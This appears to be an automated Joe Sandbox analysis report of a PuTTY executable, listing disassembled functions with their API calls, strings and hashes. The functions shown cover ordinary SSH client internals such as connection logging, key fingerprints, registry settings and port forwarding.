Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: File$Create$CloseCurrentDeleteErrorHandleLastPathProcessTempWrite
String ID: %s::/%s.html>main$%s\putty_%lu_%llu.chm
API String ID: 4085685679-1808412575
Opcode ID: dc32af3f6a8d97a7cf9551b68e455ca5b6e82c57156dd8b2f306cbdfb67be6a7
Instruction ID: 53cdf5cf3532f2dafe13fe4183659eeb499b05d8ca359143c2b0343a4f8c51d0
Opcode Fuzzy Hash: dc32af3f6a8d97a7cf9551b68e455ca5b6e82c57156dd8b2f306cbdfb67be6a7
Instruction Fuzzy Hash: CE411671A042807BE330AB24AC5AF6F77D8EB53B08F040169F515DB2D2E7B1AD4087A6

Function 00C02280 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 117COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C02351

Strings

Failed to connect to %s: %s, xrefs: 00C02302
Connected to %s, xrefs: 00C023C8
len >= 2, xrefs: 00C02367
%s, xrefs: 00C02341
ost, xrefs: 00C023AE
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/backend_socket_log.c, xrefs: 00C02362
te h, xrefs: 00C023B6
Connecting to %s, xrefs: 00C023A7
Connecting to %s port %d, xrefs: 00C022E8

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: %s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/backend_socket_log.c$Connected to %s$Connecting to %s$Connecting to %s port %d$Failed to connect to %s: %s$len >= 2$ost$te h
API String ID: 4218353326-965769772
Opcode ID: f1162cef706a0171a9b8ee03b9179fba2980b32810bd58d2de796eee43fb70ce
Instruction ID: 97a64b439a78bacc68d00e9991a38604e2f62959ab73396f3d480ed43729b4ed
Opcode Fuzzy Hash: f1162cef706a0171a9b8ee03b9179fba2980b32810bd58d2de796eee43fb70ce
Instruction Fuzzy Hash: E73178B5A0424077C6317711AC0BFAF7AACDB9A748F04003DF9894A3D2FA759A50C2A3

Function 00BA6D10 Relevance: 16.7, APIs: 11, Instructions: 181COMMON

Download Yara Rule

APIs

CreatePen.GDI32(00000000,00000000), ref: 00BA6DF8
SelectObject.GDI32(00000000), ref: 00BA6E05
MoveToEx.GDI32(?,?,00000000), ref: 00BA6E18
LineTo.GDI32(00000000,00000001), ref: 00BA6E34
SelectObject.GDI32 ref: 00BA6E43
CreatePen.GDI32(00000000,00000000), ref: 00BA6EA1
SelectObject.GDI32(00000000), ref: 00BA6EB4
Polyline.GDI32(?,00000005), ref: 00BA6EC5
SelectObject.GDI32(00000000), ref: 00BA6ED2
DeleteObject.GDI32(00000000), ref: 00BA6ED5
SetPixel.GDI32(?,?), ref: 00BA6F78

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Object$Select$Create$DeleteLineMovePixelPolyline
String ID:
API String ID: 1020918164-0
Opcode ID: b5ff40879b1949242c4871ae10c99dcd7abb0576271259a00f8e3fdc6de9094b
Instruction ID: 5c78e82f2a4f926db720e16ceeea751705cb625d85db0f747d1959d2a78a11be
Opcode Fuzzy Hash: b5ff40879b1949242c4871ae10c99dcd7abb0576271259a00f8e3fdc6de9094b
Instruction Fuzzy Hash: 9261DEB2908354AFD3108F14ED89B6EBBE9FF86318F08496EF99587260C7729D40CB41

Function 00C05FB0 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 468COMMON

Download Yara Rule

Strings

false && "ssh_fptype_from_cert ruled out the other values", xrefs: 00C06468
%.*s , xrefs: 00C0644B
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/sshpubk.c, xrefs: 00C06463
%02x%s, xrefs: 00C0605B, 00C06074, 00C0608D, 00C060A6, 00C060BF, 00C060D8, 00C060F1, 00C0610A, 00C06123, 00C0613C, 00C06155, 00C0616E, 00C06187, 00C061A0, 00C061B9, 00C061D2
%s (with certificate: %s), xrefs: 00C064F4
SHA256:, xrefs: 00C06203
%.*s %d , xrefs: 00C063BF

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: %.*s $%.*s %d $%02x%s$%s (with certificate: %s)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/sshpubk.c$SHA256:$false && "ssh_fptype_from_cert ruled out the other values"
API String ID: 4218353326-442124931
Opcode ID: 06700b4187baca6d3536c2a5dd0e04dfaf38f838d8514b15c03440752901246a
Instruction ID: 39a7b6677c7c785aa54072d267159f5ed8cfc8cf26d754447db1c6ea56e76c87
Opcode Fuzzy Hash: 06700b4187baca6d3536c2a5dd0e04dfaf38f838d8514b15c03440752901246a
Instruction Fuzzy Hash: 8FD1E3A5A443143BD211BB20AC47E2FBBECCF95718F4408A9F988972C3F665D614C7E6

Function 00BC4450 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 356comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00C70784,00000000,00000001,00C70774), ref: 00BC4495
CoCreateInstance.OLE32(00C70784,00000000,00000001,00C70774,00000000), ref: 00BC452F
CoCreateInstance.OLE32(00C707B4,00000000,00000001,00C707A4,00000000), ref: 00BC458E

Strings

Pageant.exe, xrefs: 00BC472A, 00BC4740
Recent Sessions, xrefs: 00BC4700

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CreateInstance
String ID: Pageant.exe$Recent Sessions
API String ID: 542301482-148644000
Opcode ID: b68509b6cc335d4b70e6fdc014c91d21124948333530b8229a543cf1a64827e3
Instruction ID: a4785a7ce01a7c435f777276a41da5ea5c18ac47e8cb581b2e3c5ccebba4dd7b
Opcode Fuzzy Hash: b68509b6cc335d4b70e6fdc014c91d21124948333530b8229a543cf1a64827e3
Instruction Fuzzy Hash: 81C17D70604301AFD704DF60D899F1A77E9EF89709F1088ACF889CB291DB75E945CB62

Function 00BD5AD0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,?,-0000000C), ref: 00BD5B97
inet_addr.WS2_32(?), ref: 00BD5BC1
htonl.WS2_32(00000000), ref: 00BD5BE7

Part of subcall function 00BF1A10: _strcspn.LIBCMT ref: 00BF1A61

gethostbyname.WS2_32(?), ref: 00BD5C4C
htonl.WS2_32(?), ref: 00BD5CA8
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00BEEA1C,?,?,?), ref: 00BD5CD6

Strings

Network is down, xrefs: 00BD5CF8
Host not found, xrefs: 00BD5C2D
Host does not exist, xrefs: 00BD5CFF

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: htonl$ErrorLast_strcspngetaddrinfogethostbynameinet_addr
String ID: Host does not exist$Host not found$Network is down
API String ID: 4231317714-2906891963
Opcode ID: 55fe7967a85ebf703c454903b28b1229cb9409be7def4e8019bc9c15d7fb03ac
Instruction ID: 82b29e64d92235313ca6ced9c3e0177f2fb9a4fa5c79e5e4bcd9b9ac0dd3cf02
Opcode Fuzzy Hash: 55fe7967a85ebf703c454903b28b1229cb9409be7def4e8019bc9c15d7fb03ac
Instruction Fuzzy Hash: BA51C8B06047019FE7309F24DC89B2AB7E4EB45718F14497AF84A8B391F7B5E844CB62

Function 00BD4790 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00BDC110: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 00BDC182
Part of subcall function 00BDC110: RegCloseKey.ADVAPI32(?), ref: 00BDC1BA

Part of subcall function 00BDEF00: _strlen.LIBCMT ref: 00BDEF0B

Part of subcall function 00BDC340: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BD4BC3,00000000,RandSeedFile), ref: 00BDC367
Part of subcall function 00BDC340: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BDC39F

_strlen.LIBCMT ref: 00BD4806

Part of subcall function 00BDC440: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BD4E93,00000000,Recent sessions), ref: 00BDC466
Part of subcall function 00BDC440: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BDC49D

Part of subcall function 00C02990: _strlen.LIBCMT ref: 00C029A6

_strlen.LIBCMT ref: 00BD4830

Strings

PermitRSASHA1, xrefs: 00BD48DA
PublicKey, xrefs: 00BD47F1
Validity, xrefs: 00BD481B
Software\SimonTatham\PuTTY\SshHostCAs, xrefs: 00BD47BA
MatchHosts, xrefs: 00BD485A
PermitRSASHA256, xrefs: 00BD48F5
PermitRSASHA512, xrefs: 00BD4910

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: QueryValue_strlen$CloseCreate
String ID: MatchHosts$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Validity
API String ID: 3351441687-2091482613
Opcode ID: 9f6dbc720f2a6f0732e747da2686eb9ea7fc6c2c9fcda1b6137ee7fecd2eaa61
Instruction ID: 0ca527cc150e041ee93402dba0e26ac40a7585e6f0f87e3542d7d93327a18388
Opcode Fuzzy Hash: 9f6dbc720f2a6f0732e747da2686eb9ea7fc6c2c9fcda1b6137ee7fecd2eaa61
Instruction Fuzzy Hash: 9E4192E5D043416BE610BB20AC82B3BB6D89F50749F0848B9FC8996383F7769915D7A3

Function 00BA1E64 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BA1EA7
TrackPopupMenu.USER32(00000002,?,?,00000000,?,00000000), ref: 00BA1EC8
ShowCursor.USER32(00000001), ref: 00BA2670
GetCursorPos.USER32(?), ref: 00BA2682
IsZoomed.USER32 ref: 00BA26F5
GetWindowLongA.USER32(000000F0), ref: 00BA2707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BA273D
DefWindowProcW.USER32(?,?,?,?), ref: 00BA3520

Strings

(, xrefs: 00BA26AA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Cursor$Window$LongMenuMessagePopupProcSendShowTrackZoomed
String ID: (
API String ID: 3382111338-3887548279
Opcode ID: 2893e7b2618a7b21524bbd7c69eef56904dd9fe6148c80857122a623944ddc1d
Instruction ID: 563329969145aabe8af4caac9b2e6b20b83982dcf3f22c3b1ff15c100858f11d
Opcode Fuzzy Hash: 2893e7b2618a7b21524bbd7c69eef56904dd9fe6148c80857122a623944ddc1d
Instruction Fuzzy Hash: AF41E271A4C340AFE7255F28EC69BAE7BE4FB42704F04842DF585C21A1DB718D44DB52

Function 00BD4950 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 00BDC110: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 00BDC182
Part of subcall function 00BDC110: RegCloseKey.ADVAPI32(?), ref: 00BDC1BA

Part of subcall function 00BDC400: _strlen.LIBCMT ref: 00BDC410
Part of subcall function 00BDC400: RegSetValueExA.ADVAPI32(00BD472E,?,00000000,00000001,00000000,-00000001,?,?,?,?,?,?,?,?,?,?), ref: 00BDC423

_strlen.LIBCMT ref: 00BD49D3

Part of subcall function 00C08750: ___from_strstr_to_strchr.LIBCMT ref: 00C087A5

Part of subcall function 00BDC300: RegSetValueExA.ADVAPI32(00000000,00BD4A12,00000000,00000004,00000000,00000004,?,00000000,00BD4A12,00000000,PermitRSASHA1,?), ref: 00BDC322

Part of subcall function 00BDC1E0: RegCloseKey.ADVAPI32(00000000,00BD4BCE,00000000), ref: 00BDC1E4

Strings

PermitRSASHA1, xrefs: 00BD4A07
CA record must have a name, xrefs: 00BD4A48
PublicKey, xrefs: 00BD49B8
Validity, xrefs: 00BD49EB
Unable to create registry keyHKEY_CURRENT_USER\%s\%s, xrefs: 00BD4A5E
Software\SimonTatham\PuTTY\SshHostCAs, xrefs: 00BD4978, 00BD4A59
PermitRSASHA256, xrefs: 00BD4A1A
PermitRSASHA512, xrefs: 00BD4A2D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CloseValue_strlen$Create___from_strstr_to_strchr
String ID: CA record must have a name$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Unable to create registry keyHKEY_CURRENT_USER\%s\%s$Validity
API String ID: 1175142446-1463427279
Opcode ID: becf06d747c217cffe44a6d1bc3f0f123e466f3e1803192b887a1852e4d1da5c
Instruction ID: 3b59ef36a6b897a8e1f4e0f7fd8db2ab3808cacd79ea5dbda59ea5c7a31a998e
Opcode Fuzzy Hash: becf06d747c217cffe44a6d1bc3f0f123e466f3e1803192b887a1852e4d1da5c
Instruction Fuzzy Hash: C321B7EAD401107BE70276207C43E3ABA998F51749F0940B2FD08A9387F6569925E7BB

Function 00BBFD00 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BDBFB0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BEA190,kernel32.dll), ref: 00BDBFCF

GetProcAddress.KERNEL32(00000000,InitCommonControls), ref: 00BBFD1D
GetProcAddress.KERNEL32(00000000,MakeDragList), ref: 00BBFD2A
GetProcAddress.KERNEL32(00000000,LBItemFromPt), ref: 00BBFD37
GetProcAddress.KERNEL32(00000000,DrawInsert), ref: 00BBFD44

Strings

LBItemFromPt, xrefs: 00BBFD31
MakeDragList, xrefs: 00BBFD24
DrawInsert, xrefs: 00BBFD3E
InitCommonControls, xrefs: 00BBFD17
comctl32.dll, xrefs: 00BBFD02

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: DrawInsert$InitCommonControls$LBItemFromPt$MakeDragList$comctl32.dll
API String ID: 2238633743-1292723818
Opcode ID: 2fee60eb63e7e31cab9a9e7df3680109f04636e7db83037bd0ba8373957369b9
Instruction ID: af7ce2d09b76ce30d91c613c27b678689cc46d4872466beca313c4c41507990b
Opcode Fuzzy Hash: 2fee60eb63e7e31cab9a9e7df3680109f04636e7db83037bd0ba8373957369b9
Instruction Fuzzy Hash: BDE01272541614BA9284BB757C09F9EB6ECEDD275C7170136F800D3160E7F015019F99

Function 00BC9320 Relevance: 15.1, APIs: 10, Instructions: 92threadtimeclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00BC9332
GetCapture.USER32 ref: 00BC934D
GetClipboardOwner.USER32 ref: 00BC9364
GetQueueStatus.USER32(00001CBF), ref: 00BC9380
GetCursorPos.USER32(?), ref: 00BC93A0
GlobalMemoryStatus.KERNEL32 ref: 00BC93B6
GetCurrentThread.KERNEL32 ref: 00BC93D5
GetThreadTimes.KERNEL32(00000000,?,?,?,?), ref: 00BC93E4
GetCurrentProcess.KERNEL32 ref: 00BC93F7
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00BC9402

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CurrentProcessStatusThreadTimes$CaptureClipboardCursorForegroundGlobalMemoryOwnerQueueWindow
String ID:
API String ID: 3596705544-0
Opcode ID: 6f580ad15548446e737bd1d7e676aa933703f6af50e8742cfa682abbd7138987
Instruction ID: 096fc57bea53dd673a32c0c88a113c85dea6296f7e0abed08ff7f3aef6210e9b
Opcode Fuzzy Hash: 6f580ad15548446e737bd1d7e676aa933703f6af50e8742cfa682abbd7138987
Instruction Fuzzy Hash: 32218272940310BBE2106BB1AC0EF4F3FA9EF45768F04042EF74D96191DA619509CBE3

Function 00BE71A0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 312COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00BE73BE

Strings

LRD, xrefs: 00BE72B2, 00BE72BA, 00BE72FC
You need to specify a source port number, xrefs: 00BE745E
You need to specify a destination addressin the form "host.name:port", xrefs: 00BE74E8
A46, xrefs: 00BE723F, 00BE724E
%s, xrefs: 00BE73AC
%s%s, xrefs: 00BE7352
Specified forwarding already exists, xrefs: 00BE74CB

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: %s$%s%s$A46$LRD$Specified forwarding already exists$You need to specify a destination addressin the form "host.name:port"$You need to specify a source port number
API String ID: 601868998-44983218
Opcode ID: 9ab4c341f11cad2a36d3d4536da21661741d6ffeb0878817233162c04dc9119a
Instruction ID: 020cc9190f8188c68e044137d6097086140d60ef9e6b7328991c895312aed8b9
Opcode Fuzzy Hash: 9ab4c341f11cad2a36d3d4536da21661741d6ffeb0878817233162c04dc9119a
Instruction Fuzzy Hash: BC9119B1A443407BDA117622AC43F2B7AEDDF91748F4844B9FC4596353FB22EE109267

Function 00C63A89 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00C63BA8
___TypeMatch.LIBVCRUNTIME ref: 00C63CB6
CatchIt.LIBVCRUNTIME ref: 00C63D07
_UnwindNestedFrames.LIBCMT ref: 00C63E08
CallUnexpected.LIBVCRUNTIME ref: 00C63E23

Strings

csm, xrefs: 00C63B33
csm, xrefs: 00C63BDF
csm, xrefs: 00C63AC6

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: fe0a5f948346a75dedc46659856dee2f677c780cdf10eb238526d6c85efc7487
Instruction ID: 4c5cf8f51e0325e210b3f3e91e2ed4ddf7af9e776bedc88874f595f95233784b
Opcode Fuzzy Hash: fe0a5f948346a75dedc46659856dee2f677c780cdf10eb238526d6c85efc7487
Instruction Fuzzy Hash: A1B19831800289EFCF29DFA4C8C19AEBBB5FF54314F14416AE9216B252C731DB91DBA5

Function 00BCBA54 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 303COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BCBA7D
_strlen.LIBCMT ref: 00BCBAAB

Part of subcall function 00BC55A0: ___from_strstr_to_strchr.LIBCMT ref: 00BC55B5
Part of subcall function 00BC55A0: ___from_strstr_to_strchr.LIBCMT ref: 00BC55C4

Strings

client subnegotiation: SB TSPEED IS %s, xrefs: 00BCBADF
server subnegotiation: SB TTYPE SEND, xrefs: 00BCBA29
server subnegotiation: SB TSPEED <something weird>, xrefs: 00BCBAFC
server subnegotiation: SB TSPEED SEND, xrefs: 00BCBACE
client subnegotiation: SB TTYPE IS %s, xrefs: 00BCBA3F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ___from_strstr_to_strchr_strlen
String ID: client subnegotiation: SB TSPEED IS %s$client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TSPEED <something weird>$server subnegotiation: SB TSPEED SEND$server subnegotiation: SB TTYPE SEND
API String ID: 1576176021-3164916790
Opcode ID: 6a83c4aed8e57d1c163f8006e2f987df0cc92df0c8f4e7af56ea90c1b324063d
Instruction ID: c36ce45a368d6954fea9ad54a3e287aaad46ebf026a51aebb26d3519534155ca
Opcode Fuzzy Hash: 6a83c4aed8e57d1c163f8006e2f987df0cc92df0c8f4e7af56ea90c1b324063d
Instruction Fuzzy Hash: 14A1F270A04345ABD7109B28CC87F2EB7D5EB51318F1886ADF4968B3E2E332D855D762

Function 00BC30B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 95COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(00000000,?,00000000), ref: 00BC3195

Strings

point, xrefs: 00BC3154, 00BC3163
pixel, xrefs: 00BC314F
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC310E
bold, , xrefs: 00BC3140, 00BC3165, 00BC3178
Font: %s, %sdefault height, xrefs: 00BC317C
c && c->ctrl->type == CTRL_FONTSELECT, xrefs: 00BC3113
Font: %s, %s%d-%s, xrefs: 00BC3169

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
